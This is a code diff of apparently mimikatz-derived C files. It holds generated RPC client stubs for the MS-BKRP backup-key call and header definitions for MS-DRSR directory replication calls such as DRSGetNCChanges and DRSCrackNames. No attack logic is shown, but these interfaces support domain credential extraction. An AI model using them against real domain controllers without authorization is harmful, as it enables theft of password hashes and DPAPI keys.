#if !defined(__RPC_WIN64__)
#error Invalid build platform for this stub.
#endif
static const ms2Dbkrp_MIDL_PROC_FORMAT_STRING ms2Dbkrp__MIDL_ProcFormatString = {
0,
{
/* Procedure BackuprKey */
0x0, /* 0 */
0x48, /* Old Flags: */
/* 2 */ NdrFcLong( 0x0 ), /* 0 */
/* 6 */ NdrFcShort( 0x0 ), /* 0 */
/* 8 */ NdrFcShort( 0x40 ), /* X64 Stack size/offset = 64 */
/* 10 */ 0x32, /* FC_BIND_PRIMITIVE */
0x0, /* 0 */
/* 12 */ NdrFcShort( 0x0 ), /* X64 Stack size/offset = 0 */
/* 14 */ NdrFcShort( 0x54 ), /* 84 */
/* 16 */ NdrFcShort( 0x24 ), /* 36 */
/* 18 */ 0x47, /* Oi2 Flags: srv must size, clt must size, has return, has ext, */
0x7, /* 7 */
/* 20 */ 0xa, /* 10 */
0x7, /* Ext Flags: new corr desc, clt corr check, srv corr check, */
/* 22 */ NdrFcShort( 0x1 ), /* 1 */
/* 24 */ NdrFcShort( 0x1 ), /* 1 */
/* 26 */ NdrFcShort( 0x0 ), /* 0 */
/* 28 */ NdrFcShort( 0x0 ), /* 0 */
/* Parameter h */
/* 30 */ NdrFcShort( 0x10a ), /* Flags: must free, in, simple ref, */
/* 32 */ NdrFcShort( 0x8 ), /* X64 Stack size/offset = 8 */
/* 34 */ NdrFcShort( 0xc ), /* Type Offset=12 */
/* Parameter pguidActionAgent */
/* 36 */ NdrFcShort( 0x10b ), /* Flags: must size, must free, in, simple ref, */
/* 38 */ NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */
/* 40 */ NdrFcShort( 0x1c ), /* Type Offset=28 */
/* Parameter pDataIn */
/* 42 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */
/* 44 */ NdrFcShort( 0x18 ), /* X64 Stack size/offset = 24 */
/* 46 */ 0x8, /* FC_LONG */
0x0, /* 0 */
/* Parameter cbDataIn */
/* 48 */ NdrFcShort( 0x2013 ), /* Flags: must size, must free, out, srv alloc size=8 */
/* 50 */ NdrFcShort( 0x20 ), /* X64 Stack size/offset = 32 */
/* 52 */ NdrFcShort( 0x28 ), /* Type Offset=40 */
/* Parameter ppDataOut */
/* 54 */ NdrFcShort( 0x2150 ), /* Flags: out, base type, simple ref, srv alloc size=8 */
/* 56 */ NdrFcShort( 0x28 ), /* X64 Stack size/offset = 40 */
/* 58 */ 0x8, /* FC_LONG */
0x0, /* 0 */
/* Parameter pcbDataOut */
/* 60 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */
/* 62 */ NdrFcShort( 0x30 ), /* X64 Stack size/offset = 48 */
/* 64 */ 0x8, /* FC_LONG */
0x0, /* 0 */
/* Parameter dwParam */
/* 66 */ NdrFcShort( 0x70 ), /* Flags: out, return, base type, */
/* 68 */ NdrFcShort( 0x38 ), /* X64 Stack size/offset = 56 */
/* 70 */ 0x8, /* FC_LONG */
0x0, /* 0 */
0x0
}
};
static const ms2Dbkrp_MIDL_TYPE_FORMAT_STRING ms2Dbkrp__MIDL_TypeFormatString = {
0,
{
NdrFcShort( 0x0 ), /* 0 */
/* 2 */
0x11, 0x0, /* FC_RP */
/* 4 */ NdrFcShort( 0x8 ), /* Offset= 8 (12) */
/* 6 */
0x1d, /* FC_SMFARRAY */
0x0, /* 0 */
/* 8 */ NdrFcShort( 0x8 ), /* 8 */
/* 10 */ 0x1, /* FC_BYTE */
0x5b, /* FC_END */
/* 12 */
0x15, /* FC_STRUCT */
0x3, /* 3 */
/* 14 */ NdrFcShort( 0x10 ), /* 16 */
/* 16 */ 0x8, /* FC_LONG */
0x6, /* FC_SHORT */
/* 18 */ 0x6, /* FC_SHORT */
0x4c, /* FC_EMBEDDED_COMPLEX */
/* 20 */ 0x0, /* 0 */
NdrFcShort( 0xfff1 ), /* Offset= -15 (6) */
0x5b, /* FC_END */
/* 24 */
0x11, 0x0, /* FC_RP */
/* 26 */ NdrFcShort( 0x2 ), /* Offset= 2 (28) */
/* 28 */
0x1b, /* FC_CARRAY */
0x0, /* 0 */
/* 30 */ NdrFcShort( 0x1 ), /* 1 */
/* 32 */ 0x29, /* Corr desc: parameter, FC_ULONG */
0x0, /* */
/* 34 */ NdrFcShort( 0x18 ), /* X64 Stack size/offset = 24 */
/* 36 */ NdrFcShort( 0x0 ), /* Corr flags: */
/* 38 */ 0x1, /* FC_BYTE */
0x5b, /* FC_END */
/* 40 */
0x11, 0x14, /* FC_RP [alloced_on_stack] [pointer_deref] */
/* 42 */ NdrFcShort( 0x2 ), /* Offset= 2 (44) */
/* 44 */
0x12, 0x0, /* FC_UP */
/* 46 */ NdrFcShort( 0x2 ), /* Offset= 2 (48) */
/* 48 */
0x1b, /* FC_CARRAY */
0x0, /* 0 */
/* 50 */ NdrFcShort( 0x1 ), /* 1 */
/* 52 */ 0x29, /* Corr desc: parameter, FC_ULONG */
0x54, /* FC_DEREFERENCE */
/* 54 */ NdrFcShort( 0x28 ), /* X64 Stack size/offset = 40 */
/* 56 */ NdrFcShort( 0x0 ), /* Corr flags: */
/* 58 */ 0x1, /* FC_BYTE */
0x5b, /* FC_END */
/* 60 */
0x11, 0xc, /* FC_RP [alloced_on_stack] [simple_pointer] */
/* 62 */ 0x8, /* FC_LONG */
0x5c, /* FC_PAD */
0x0
}
};
#elif defined _M_IX86
typedef struct _ms2Dbkrp_MIDL_TYPE_FORMAT_STRING
{
short Pad;
unsigned char Format[65];
} ms2Dbkrp_MIDL_TYPE_FORMAT_STRING;
typedef struct _ms2Dbkrp_MIDL_PROC_FORMAT_STRING
{
short Pad;
unsigned char Format[71];
} ms2Dbkrp_MIDL_PROC_FORMAT_STRING;
extern const ms2Dbkrp_MIDL_TYPE_FORMAT_STRING ms2Dbkrp__MIDL_TypeFormatString;
extern const ms2Dbkrp_MIDL_PROC_FORMAT_STRING ms2Dbkrp__MIDL_ProcFormatString;
static const RPC_CLIENT_INTERFACE BackupKey___RpcClientInterface = {sizeof(RPC_CLIENT_INTERFACE), {{0x3dde7c30, 0x165d, 0x11d1, {0xab, 0x8f, 0x00, 0x80, 0x5f, 0x14, 0xdb, 0x40}}, {1, 0}}, {{0x8A885D04, 0x1CEB, 0x11C9, {0x9F, 0xE8, 0x08, 0x00, 0x2B, 0x10, 0x48, 0x60}}, {2, 0}}, 0, 0, 0, 0, 0, 0x00000000};
static RPC_BINDING_HANDLE BackupKey__MIDL_AutoBindHandle;
static const MIDL_STUB_DESC BackupKey_StubDesc = {(void *) &BackupKey___RpcClientInterface, MIDL_user_allocate, MIDL_user_free, &BackupKey__MIDL_AutoBindHandle, 0, 0, 0, 0, ms2Dbkrp__MIDL_TypeFormatString.Format, 1, 0x60000, 0, 0x8000253, 0, 0, 0, 0x1, 0, 0, 0};
#pragma optimize("", off)
NET_API_STATUS BackuprKey(handle_t h, GUID *pguidActionAgent, byte *pDataIn, DWORD cbDataIn, byte **ppDataOut, DWORD *pcbDataOut, DWORD dwParam)
{
return (NET_API_STATUS) NdrClientCall2((PMIDL_STUB_DESC) &BackupKey_StubDesc, (PFORMAT_STRING) &ms2Dbkrp__MIDL_ProcFormatString.Format[0], (unsigned char *) &h).Simple;
}
#pragma optimize("", on)
#if !defined(__RPC_WIN32__)
#error Invalid build platform for this stub.
#endif
#if !(TARGET_IS_NT51_OR_LATER)
#error You need Windows XP or later to run this stub because it uses these features:
#error compiled for Windows XP.
#error However, your C/C++ compilation flags indicate you intend to run this app on earlier systems.
#error This app will fail with the RPC_X_WRONG_STUB_VERSION error.
#endif
static const ms2Dbkrp_MIDL_PROC_FORMAT_STRING ms2Dbkrp__MIDL_ProcFormatString = {
0,
{
/* Procedure BackuprKey */
0x0, /* 0 */
0x48, /* Old Flags: */
/* 2 */ NdrFcLong( 0x0 ), /* 0 */
/* 6 */ NdrFcShort( 0x0 ), /* 0 */
/* 8 */ NdrFcShort( 0x20 ), /* x86 Stack size/offset = 32 */
/* 10 */ 0x32, /* FC_BIND_PRIMITIVE */
0x0, /* 0 */
/* 12 */ NdrFcShort( 0x0 ), /* x86 Stack size/offset = 0 */
/* 14 */ NdrFcShort( 0x54 ), /* 84 */
/* 16 */ NdrFcShort( 0x24 ), /* 36 */
/* 18 */ 0x47, /* Oi2 Flags: srv must size, clt must size, has return, has ext, */
0x7, /* 7 */
/* 20 */ 0x8, /* 8 */
0x7, /* Ext Flags: new corr desc, clt corr check, srv corr check, */
/* 22 */ NdrFcShort( 0x1 ), /* 1 */
/* 24 */ NdrFcShort( 0x1 ), /* 1 */
/* 26 */ NdrFcShort( 0x0 ), /* 0 */
/* Parameter h */
/* 28 */ NdrFcShort( 0x10a ), /* Flags: must free, in, simple ref, */
/* 30 */ NdrFcShort( 0x4 ), /* x86 Stack size/offset = 4 */
/* 32 */ NdrFcShort( 0xc ), /* Type Offset=12 */
/* Parameter pguidActionAgent */
/* 34 */ NdrFcShort( 0x10b ), /* Flags: must size, must free, in, simple ref, */
/* 36 */ NdrFcShort( 0x8 ), /* x86 Stack size/offset = 8 */
/* 38 */ NdrFcShort( 0x1c ), /* Type Offset=28 */
/* Parameter pDataIn */
/* 40 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */
/* 42 */ NdrFcShort( 0xc ), /* x86 Stack size/offset = 12 */
/* 44 */ 0x8, /* FC_LONG */
0x0, /* 0 */
/* Parameter cbDataIn */
/* 46 */ NdrFcShort( 0x2013 ), /* Flags: must size, must free, out, srv alloc size=8 */
/* 48 */ NdrFcShort( 0x10 ), /* x86 Stack size/offset = 16 */
/* 50 */ NdrFcShort( 0x28 ), /* Type Offset=40 */
/* Parameter ppDataOut */
/* 52 */ NdrFcShort( 0x2150 ), /* Flags: out, base type, simple ref, srv alloc size=8 */
/* 54 */ NdrFcShort( 0x14 ), /* x86 Stack size/offset = 20 */
/* 56 */ 0x8, /* FC_LONG */
0x0, /* 0 */
/* Parameter pcbDataOut */
/* 58 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */
/* 60 */ NdrFcShort( 0x18 ), /* x86 Stack size/offset = 24 */
/* 62 */ 0x8, /* FC_LONG */
0x0, /* 0 */
/* Parameter dwParam */
/* 64 */ NdrFcShort( 0x70 ), /* Flags: out, return, base type, */
/* 66 */ NdrFcShort( 0x1c ), /* x86 Stack size/offset = 28 */
/* 68 */ 0x8, /* FC_LONG */
0x0, /* 0 */
0x0
}
};
static const ms2Dbkrp_MIDL_TYPE_FORMAT_STRING ms2Dbkrp__MIDL_TypeFormatString = {
0,
{
NdrFcShort( 0x0 ), /* 0 */
/* 2 */
0x11, 0x0, /* FC_RP */
/* 4 */ NdrFcShort( 0x8 ), /* Offset= 8 (12) */
/* 6 */
0x1d, /* FC_SMFARRAY */
0x0, /* 0 */
/* 8 */ NdrFcShort( 0x8 ), /* 8 */
/* 10 */ 0x1, /* FC_BYTE */
0x5b, /* FC_END */
/* 12 */
0x15, /* FC_STRUCT */
0x3, /* 3 */
/* 14 */ NdrFcShort( 0x10 ), /* 16 */
/* 16 */ 0x8, /* FC_LONG */
0x6, /* FC_SHORT */
/* 18 */ 0x6, /* FC_SHORT */
0x4c, /* FC_EMBEDDED_COMPLEX */
/* 20 */ 0x0, /* 0 */
NdrFcShort( 0xfff1 ), /* Offset= -15 (6) */
0x5b, /* FC_END */
/* 24 */
0x11, 0x0, /* FC_RP */
/* 26 */ NdrFcShort( 0x2 ), /* Offset= 2 (28) */
/* 28 */
0x1b, /* FC_CARRAY */
0x0, /* 0 */
/* 30 */ NdrFcShort( 0x1 ), /* 1 */
/* 32 */ 0x29, /* Corr desc: parameter, FC_ULONG */
0x0, /* */
/* 34 */ NdrFcShort( 0xc ), /* x86 Stack size/offset = 12 */
/* 36 */ NdrFcShort( 0x0 ), /* Corr flags: */
/* 38 */ 0x1, /* FC_BYTE */
0x5b, /* FC_END */
/* 40 */
0x11, 0x14, /* FC_RP [alloced_on_stack] [pointer_deref] */
/* 42 */ NdrFcShort( 0x2 ), /* Offset= 2 (44) */
/* 44 */
0x12, 0x0, /* FC_UP */
/* 46 */ NdrFcShort( 0x2 ), /* Offset= 2 (48) */
/* 48 */
0x1b, /* FC_CARRAY */
0x0, /* 0 */
/* 50 */ NdrFcShort( 0x1 ), /* 1 */
/* 52 */ 0x29, /* Corr desc: parameter, FC_ULONG */
0x54, /* FC_DEREFERENCE */
/* 54 */ NdrFcShort( 0x14 ), /* x86 Stack size/offset = 20 */
/* 56 */ NdrFcShort( 0x0 ), /* Corr flags: */
/* 58 */ 0x1, /* FC_BYTE */
0x5b, /* FC_END */
/* 60 */
0x11, 0xc, /* FC_RP [alloced_on_stack] [simple_pointer] */
/* 62 */ 0x8, /* FC_LONG */
0x5c, /* FC_PAD */
0x0
}
};
#endif
#if _MSC_VER >= 1200
#pragma warning(pop)
#endif

View File

@ -0,0 +1,465 @@
#pragma once
#include "kull_m_rpc.h"
typedef LONGLONG DSTIME;
typedef LONGLONG USN;
typedef ULONG ATTRTYP;
typedef void *DRS_HANDLE;
typedef struct _NT4SID {
unsigned char Data[ 28 ];
} NT4SID;
typedef struct _DSNAME {
unsigned long structLen;
unsigned long SidLen;
GUID Guid;
NT4SID Sid;
unsigned long NameLen;
WCHAR StringName[ANYSIZE_ARRAY];
} DSNAME;
typedef struct _USN_VECTOR {
USN usnHighObjUpdate;
USN usnReserved;
USN usnHighPropUpdate;
} USN_VECTOR;
typedef struct _UPTODATE_CURSOR_V1 {
UUID uuidDsa;
USN usnHighPropUpdate;
} UPTODATE_CURSOR_V1;
typedef struct _UPTODATE_VECTOR_V1_EXT {
DWORD dwVersion;
DWORD dwReserved1;
DWORD cNumCursors;
DWORD dwReserved2;
UPTODATE_CURSOR_V1 rgCursors[ANYSIZE_ARRAY];
} UPTODATE_VECTOR_V1_EXT;
typedef struct _OID_t {
unsigned int length;
BYTE *elements;
} OID_t;
typedef struct _PrefixTableEntry {
unsigned long ndx;
OID_t prefix;
} PrefixTableEntry;
typedef struct _SCHEMA_PREFIX_TABLE {
DWORD PrefixCount;
PrefixTableEntry *pPrefixEntry;
} SCHEMA_PREFIX_TABLE;
typedef struct _PARTIAL_ATTR_VECTOR_V1_EXT {
DWORD dwVersion;
DWORD dwReserved1;
DWORD cAttrs;
ATTRTYP rgPartialAttr[ANYSIZE_ARRAY];
} PARTIAL_ATTR_VECTOR_V1_EXT;
typedef struct _MTX_ADDR {
unsigned long mtx_namelen;
unsigned char mtx_name[ANYSIZE_ARRAY];
} MTX_ADDR;
typedef struct _ATTRVAL {
ULONG valLen;
UCHAR *pVal;
} ATTRVAL;
typedef struct _ATTRVALBLOCK {
ULONG valCount;
ATTRVAL *pAVal;
} ATTRVALBLOCK;
typedef struct _ATTR {
ATTRTYP attrTyp;
ATTRVALBLOCK AttrVal;
} ATTR;
typedef struct _ATTRBLOCK {
ULONG attrCount;
ATTR *pAttr;
} ATTRBLOCK;
typedef struct _ENTINF {
DSNAME *pName;
unsigned long ulFlags;
ATTRBLOCK AttrBlock;
} ENTINF;
typedef struct _PROPERTY_META_DATA_EXT {
DWORD dwVersion;
DSTIME timeChanged;
UUID uuidDsaOriginating;
USN usnOriginating;
} PROPERTY_META_DATA_EXT;
typedef struct _PROPERTY_META_DATA_EXT_VECTOR {
DWORD cNumProps;
PROPERTY_META_DATA_EXT rgMetaData[ANYSIZE_ARRAY];
} PROPERTY_META_DATA_EXT_VECTOR;
typedef struct _REPLENTINFLIST {
struct _REPLENTINFLIST *pNextEntInf;
ENTINF Entinf;
BOOL fIsNCPrefix;
UUID *pParentGuid;
PROPERTY_META_DATA_EXT_VECTOR *pMetaDataExt;
} REPLENTINFLIST;
typedef struct _UPTODATE_CURSOR_V2 {
UUID uuidDsa;
USN usnHighPropUpdate;
DSTIME timeLastSyncSuccess;
} UPTODATE_CURSOR_V2;
typedef struct _UPTODATE_VECTOR_V2_EXT {
DWORD dwVersion;
DWORD dwReserved1;
DWORD cNumCursors;
DWORD dwReserved2;
UPTODATE_CURSOR_V2 rgCursors[ANYSIZE_ARRAY];
} UPTODATE_VECTOR_V2_EXT;
typedef struct _VALUE_META_DATA_EXT_V1 {
DSTIME timeCreated;
PROPERTY_META_DATA_EXT MetaData;
} VALUE_META_DATA_EXT_V1;
typedef struct _VALUE_META_DATA_EXT_V3 {
DSTIME timeCreated;
PROPERTY_META_DATA_EXT MetaData;
DWORD unused1;
DWORD unused2;
DWORD unused3;
DSTIME timeExpired;
} VALUE_META_DATA_EXT_V3;
typedef struct _REPLVALINF_V1 {
DSNAME *pObject;
ATTRTYP attrTyp;
ATTRVAL Aval;
BOOL fIsPresent;
VALUE_META_DATA_EXT_V1 MetaData;
} REPLVALINF_V1;
typedef struct REPLVALINF_V3 {
DSNAME *pObject;
ATTRTYP attrTyp;
ATTRVAL Aval;
BOOL fIsPresent;
VALUE_META_DATA_EXT_V3 MetaData;
} REPLVALINF_V3;
typedef struct _DS_NAME_RESULT_ITEMW {
DWORD status;
WCHAR *pDomain;
WCHAR *pName;
} DS_NAME_RESULT_ITEMW, *PDS_NAME_RESULT_ITEMW;
typedef struct _DS_NAME_RESULTW {
DWORD cItems;
PDS_NAME_RESULT_ITEMW rItems;
} DS_NAME_RESULTW, *PDS_NAME_RESULTW;
typedef struct _DS_DOMAIN_CONTROLLER_INFO_1W {
WCHAR *NetbiosName;
WCHAR *DnsHostName;
WCHAR *SiteName;
WCHAR *ComputerObjectName;
WCHAR *ServerObjectName;
BOOL fIsPdc;
BOOL fDsEnabled;
} DS_DOMAIN_CONTROLLER_INFO_1W;
typedef struct _DS_DOMAIN_CONTROLLER_INFO_2W {
WCHAR *NetbiosName;
WCHAR *DnsHostName;
WCHAR *SiteName;
WCHAR *SiteObjectName;
WCHAR *ComputerObjectName;
WCHAR *ServerObjectName;
WCHAR *NtdsDsaObjectName;
BOOL fIsPdc;
BOOL fDsEnabled;
BOOL fIsGc;
GUID SiteObjectGuid;
GUID ComputerObjectGuid;
GUID ServerObjectGuid;
GUID NtdsDsaObjectGuid;
} DS_DOMAIN_CONTROLLER_INFO_2W;
typedef struct _DS_DOMAIN_CONTROLLER_INFO_3W {
WCHAR *NetbiosName;
WCHAR *DnsHostName;
WCHAR *SiteName;
WCHAR *SiteObjectName;
WCHAR *ComputerObjectName;
WCHAR *ServerObjectName;
WCHAR *NtdsDsaObjectName;
BOOL fIsPdc;
BOOL fDsEnabled;
BOOL fIsGc;
BOOL fIsRodc;
GUID SiteObjectGuid;
GUID ComputerObjectGuid;
GUID ServerObjectGuid;
GUID NtdsDsaObjectGuid;
} DS_DOMAIN_CONTROLLER_INFO_3W;
typedef struct _DS_DOMAIN_CONTROLLER_INFO_FFFFFFFFW {
DWORD IPAddress;
DWORD NotificationCount;
DWORD secTimeConnected;
DWORD Flags;
DWORD TotalRequests;
DWORD Reserved1;
WCHAR *UserName;
} DS_DOMAIN_CONTROLLER_INFO_FFFFFFFFW;
typedef struct _ENTINFLIST {
struct _ENTINFLIST *pNextEntInf;
ENTINF Entinf;
} ENTINFLIST;
typedef struct _DRS_EXTENSIONS {
DWORD cb;
BYTE rgb[ANYSIZE_ARRAY];
} DRS_EXTENSIONS;
typedef struct _DRS_MSG_GETCHGREQ_V3 {
UUID uuidDsaObjDest;
UUID uuidInvocIdSrc;
DSNAME *pNC;
USN_VECTOR usnvecFrom;
UPTODATE_VECTOR_V1_EXT *pUpToDateVecDestV1;
PARTIAL_ATTR_VECTOR_V1_EXT *pPartialAttrVecDestV1;
SCHEMA_PREFIX_TABLE PrefixTableDest;
ULONG ulFlags;
ULONG cMaxObjects;
ULONG cMaxBytes;
ULONG ulExtendedOp;
} DRS_MSG_GETCHGREQ_V3;
typedef struct _DRS_MSG_GETCHGREQ_V4 {
UUID uuidTransportObj;
MTX_ADDR *pmtxReturnAddress;
DRS_MSG_GETCHGREQ_V3 V3;
} DRS_MSG_GETCHGREQ_V4;
typedef struct _DRS_MSG_GETCHGREQ_V7 {
UUID uuidTransportObj;
MTX_ADDR *pmtxReturnAddress;
DRS_MSG_GETCHGREQ_V3 V3;
PARTIAL_ATTR_VECTOR_V1_EXT *pPartialAttrSet;
PARTIAL_ATTR_VECTOR_V1_EXT *pPartialAttrSetEx;
SCHEMA_PREFIX_TABLE PrefixTableDest;
} DRS_MSG_GETCHGREQ_V7;
typedef struct _DRS_MSG_GETCHGREPLY_V1 {
UUID uuidDsaObjSrc;
UUID uuidInvocIdSrc;
DSNAME *pNC;
USN_VECTOR usnvecFrom;
USN_VECTOR usnvecTo;
UPTODATE_VECTOR_V1_EXT *pUpToDateVecSrcV1;
SCHEMA_PREFIX_TABLE PrefixTableSrc;
ULONG ulExtendedRet;
ULONG cNumObjects;
ULONG cNumBytes;
REPLENTINFLIST *pObjects;
BOOL fMoreData;
} DRS_MSG_GETCHGREPLY_V1;
typedef struct _DRS_MSG_GETCHGREPLY_V6 {
UUID uuidDsaObjSrc;
UUID uuidInvocIdSrc;
DSNAME *pNC;
USN_VECTOR usnvecFrom;
USN_VECTOR usnvecTo;
UPTODATE_VECTOR_V2_EXT *pUpToDateVecSrc;
SCHEMA_PREFIX_TABLE PrefixTableSrc;
ULONG ulExtendedRet;
ULONG cNumObjects;
ULONG cNumBytes;
REPLENTINFLIST *pObjects;
BOOL fMoreData;
ULONG cNumNcSizeObjects;
ULONG cNumNcSizeValues;
DWORD cNumValues;
REPLVALINF_V1 *rgValues;
DWORD dwDRSError;
} DRS_MSG_GETCHGREPLY_V6;
typedef struct _DRS_MSG_GETCHGREPLY_V9 {
UUID uuidDsaObjSrc;
UUID uuidInvocIdSrc;
DSNAME *pNC;
USN_VECTOR usnvecFrom;
USN_VECTOR usnvecTo;
UPTODATE_VECTOR_V2_EXT *pUpToDateVecSrc;
SCHEMA_PREFIX_TABLE PrefixTableSrc;
ULONG ulExtendedRet;
ULONG cNumObjects;
ULONG cNumBytes;
REPLENTINFLIST *pObjects;
BOOL fMoreData;
ULONG cNumNcSizeObjects;
ULONG cNumNcSizeValues;
DWORD cNumValues;
REPLVALINF_V3 *rgValues;
DWORD dwDRSError;
} DRS_MSG_GETCHGREPLY_V9;
typedef struct _DRS_COMPRESSED_BLOB {
DWORD cbUncompressedSize;
DWORD cbCompressedSize;
BYTE *pbCompressedData;
} DRS_COMPRESSED_BLOB;
typedef struct _DRS_MSG_GETCHGREQ_V5 {
UUID uuidDsaObjDest;
UUID uuidInvocIdSrc;
DSNAME *pNC;
USN_VECTOR usnvecFrom;
UPTODATE_VECTOR_V1_EXT *pUpToDateVecDestV1;
ULONG ulFlags;
ULONG cMaxObjects;
ULONG cMaxBytes;
ULONG ulExtendedOp;
ULARGE_INTEGER liFsmoInfo;
} DRS_MSG_GETCHGREQ_V5;
typedef struct _DRS_MSG_GETCHGREQ_V8 {
UUID uuidDsaObjDest;
UUID uuidInvocIdSrc;
DSNAME *pNC;
USN_VECTOR usnvecFrom;
UPTODATE_VECTOR_V1_EXT *pUpToDateVecDest;
ULONG ulFlags;
ULONG cMaxObjects;
ULONG cMaxBytes;
ULONG ulExtendedOp;
ULARGE_INTEGER liFsmoInfo;
PARTIAL_ATTR_VECTOR_V1_EXT *pPartialAttrSet;
PARTIAL_ATTR_VECTOR_V1_EXT *pPartialAttrSetEx;
SCHEMA_PREFIX_TABLE PrefixTableDest;
} DRS_MSG_GETCHGREQ_V8;
typedef struct _DRS_MSG_GETCHGREQ_V10 {
UUID uuidDsaObjDest;
UUID uuidInvocIdSrc;
DSNAME *pNC;
USN_VECTOR usnvecFrom;
UPTODATE_VECTOR_V1_EXT *pUpToDateVecDest;
ULONG ulFlags;
ULONG cMaxObjects;
ULONG cMaxBytes;
ULONG ulExtendedOp;
ULARGE_INTEGER liFsmoInfo;
PARTIAL_ATTR_VECTOR_V1_EXT *pPartialAttrSet;
PARTIAL_ATTR_VECTOR_V1_EXT *pPartialAttrSetEx;
SCHEMA_PREFIX_TABLE PrefixTableDest;
ULONG ulMoreFlags;
} DRS_MSG_GETCHGREQ_V10;
typedef union _DRS_MSG_GETCHGREQ {
DRS_MSG_GETCHGREQ_V4 V4;
DRS_MSG_GETCHGREQ_V5 V5;
DRS_MSG_GETCHGREQ_V7 V7;
DRS_MSG_GETCHGREQ_V8 V8;
DRS_MSG_GETCHGREQ_V10 V10;
} DRS_MSG_GETCHGREQ;
typedef struct _DRS_MSG_GETCHGREPLY_V2 {
DRS_COMPRESSED_BLOB CompressedV1;
} DRS_MSG_GETCHGREPLY_V2;
typedef enum _DRS_COMP_ALG_TYPE {
DRS_COMP_ALG_NONE = 0,
DRS_COMP_ALG_UNUSED = 1,
DRS_COMP_ALG_MSZIP = 2,
DRS_COMP_ALG_WIN2K3 = 3
} DRS_COMP_ALG_TYPE;
typedef struct _DRS_MSG_GETCHGREPLY_V7 {
DWORD dwCompressedVersion;
DRS_COMP_ALG_TYPE CompressionAlg;
DRS_COMPRESSED_BLOB CompressedAny;
} DRS_MSG_GETCHGREPLY_V7;
typedef union _DRS_MSG_GETCHGREPLY {
DRS_MSG_GETCHGREPLY_V1 V1;
DRS_MSG_GETCHGREPLY_V2 V2;
DRS_MSG_GETCHGREPLY_V6 V6;
DRS_MSG_GETCHGREPLY_V7 V7;
DRS_MSG_GETCHGREPLY_V9 V9;
} DRS_MSG_GETCHGREPLY;
typedef struct _DRS_MSG_CRACKREQ_V1 {
ULONG CodePage;
ULONG LocaleId;
DWORD dwFlags;
DWORD formatOffered;
DWORD formatDesired;
DWORD cNames;
WCHAR **rpNames;
} DRS_MSG_CRACKREQ_V1;
typedef union _DRS_MSG_CRACKREQ {
DRS_MSG_CRACKREQ_V1 V1;
} DRS_MSG_CRACKREQ;
typedef struct _DRS_MSG_CRACKREPLY_V1 {
DS_NAME_RESULTW *pResult;
} DRS_MSG_CRACKREPLY_V1;
typedef union _DRS_MSG_CRACKREPLY {
DRS_MSG_CRACKREPLY_V1 V1;
} DRS_MSG_CRACKREPLY;
typedef struct _DRS_MSG_DCINFOREQ_V1 {
WCHAR *Domain;
DWORD InfoLevel;
} DRS_MSG_DCINFOREQ_V1;
typedef union _DRS_MSG_DCINFOREQ {
DRS_MSG_DCINFOREQ_V1 V1;
} DRS_MSG_DCINFOREQ, *PDRS_MSG_DCINFOREQ;
typedef struct _DRS_MSG_DCINFOREPLY_V1 {
DWORD cItems;
DS_DOMAIN_CONTROLLER_INFO_1W *rItems;
} DRS_MSG_DCINFOREPLY_V1;
typedef struct _DRS_MSG_DCINFOREPLY_V2 {
DWORD cItems;
DS_DOMAIN_CONTROLLER_INFO_2W *rItems;
} DRS_MSG_DCINFOREPLY_V2;
typedef struct _DRS_MSG_DCINFOREPLY_V3 {
DWORD cItems;
DS_DOMAIN_CONTROLLER_INFO_3W *rItems;
} DRS_MSG_DCINFOREPLY_V3;
typedef struct _DRS_MSG_DCINFOREPLY_VFFFFFFFF {
DWORD cItems;
DS_DOMAIN_CONTROLLER_INFO_FFFFFFFFW *rItems;
} DRS_MSG_DCINFOREPLY_VFFFFFFFF;
typedef union _DRS_MSG_DCINFOREPLY {
DRS_MSG_DCINFOREPLY_V1 V1;
DRS_MSG_DCINFOREPLY_V2 V2;
DRS_MSG_DCINFOREPLY_V3 V3;
DRS_MSG_DCINFOREPLY_VFFFFFFFF VFFFFFFFF;
} DRS_MSG_DCINFOREPLY;
ULONG IDL_DRSBind(handle_t rpc_handle, UUID *puuidClientDsa, DRS_EXTENSIONS *pextClient, DRS_EXTENSIONS **ppextServer, DRS_HANDLE *phDrs);
ULONG IDL_DRSUnbind(DRS_HANDLE *phDrs);
ULONG IDL_DRSGetNCChanges(DRS_HANDLE hDrs, DWORD dwInVersion, DRS_MSG_GETCHGREQ *pmsgIn, DWORD *pdwOutVersion, DRS_MSG_GETCHGREPLY *pmsgOut);
ULONG IDL_DRSCrackNames(DRS_HANDLE hDrs, DWORD dwInVersion, DRS_MSG_CRACKREQ *pmsgIn, DWORD *pdwOutVersion, DRS_MSG_CRACKREPLY *pmsgOut);
ULONG IDL_DRSDomainControllerInfo(DRS_HANDLE hDrs, DWORD dwInVersion, DRS_MSG_DCINFOREQ *pmsgIn, DWORD *pdwOutVersion, DRS_MSG_DCINFOREPLY *pmsgOut);

File diff suppressed because it is too large Load Diff

View File

@ -0,0 +1,5 @@
#pragma once
#include "kull_m_rpc.h"
typedef DWORD NET_API_STATUS;
typedef UNICODE_STRING RPC_UNICODE_STRING;

View File

@ -0,0 +1,808 @@
#include "kull_m_rpc_ms-pac.h"
#if _MSC_VER >= 1200
#pragma warning(push)
#endif
#pragma warning(disable: 4211) /* redefine extern to static */
#pragma warning(disable: 4232) /* dllimport identity*/
#pragma warning(disable: 4024) /* array to pointer mapping*/
#ifdef _M_X64
#define _ms_pac_MIDL_TYPE_FORMAT_STRING_SIZE 351
#define _ms_pac_MIDL_TYPE_FORMAT_STRING_PKERB_VALIDATION_INFO_Offset 346
#elif defined _M_IX86
#define _ms_pac_MIDL_TYPE_FORMAT_STRING_SIZE 561
#define _ms_pac_MIDL_TYPE_FORMAT_STRING_PKERB_VALIDATION_INFO_Offset 556
#endif
typedef struct _ms_pac_MIDL_TYPE_FORMAT_STRING
{
short Pad;
unsigned char Format[_ms_pac_MIDL_TYPE_FORMAT_STRING_SIZE];
} ms_pac_MIDL_TYPE_FORMAT_STRING;
extern const ms_pac_MIDL_TYPE_FORMAT_STRING ms_pac__MIDL_TypeFormatString;
